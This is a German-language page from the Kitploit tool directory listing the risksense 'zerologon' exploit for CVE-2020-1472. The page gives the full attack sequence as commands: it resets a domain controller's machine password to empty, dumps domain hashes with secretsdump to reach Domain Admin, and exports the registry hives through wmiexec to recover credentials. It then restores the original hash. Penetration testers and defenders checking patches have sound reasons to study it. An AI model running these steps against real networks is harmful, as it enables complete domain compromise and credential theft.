Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
zerologon — Exploit für zerologon cve-2020-1472 | Kitploit
Tools/GitHubGitHub/risksense/zerologon
Privilege EscalationPasswortangriffeSchwachstellenanalyseExploitationPenetrationstests
GitHubrisksense/zerologon

zerologon

Exploit für zerologon cve-2020-1472

Repository anzeigen
704146vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ZeroLogon Exploitation-Skript

Exploit-Code basierend auf https://www.secura.com/blog/zero-logon und https://github.com/SecuraBV/CVE-2020-1472. Ursprüngliche Forschung und Scanner von Secura, Modifikationen von RiskSense Inc.

Um zu exploitieren, entfernen Sie alle vorherigen Impacket-Installationen und installieren Sie Impacket von https://github.com/SecureAuthCorp/impacket/commit/b867b21 oder neuer. Führen Sie dann aus:

root@kitploit:~
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

Wenn das erfolgreich ist, können Sie dann:

root@kitploit:~
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'

was Ihnen Domain Admin verschaffen sollte. Nachdem Sie das haben, verwenden Sie wmiexec.py auf dem Ziel-DC mit einem Credential aus dem secretsdump und führen Sie aus:

root@kitploit:~
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

Dann können Sie

root@kitploit:~
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Und das sollte Ihnen den ursprünglichen NT-Hash des Maschinenkontos anzeigen. Sie können dann diesen ursprünglichen Maschinenkonten-Hash mit folgendem Befehl in der Domäne wiederherstellen:

root@kitploit:~
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

Die Wiederherstellung des ursprünglichen Hashs ist notwendig, damit der DC normal weiterarbeiten kann.

Tool herunterladen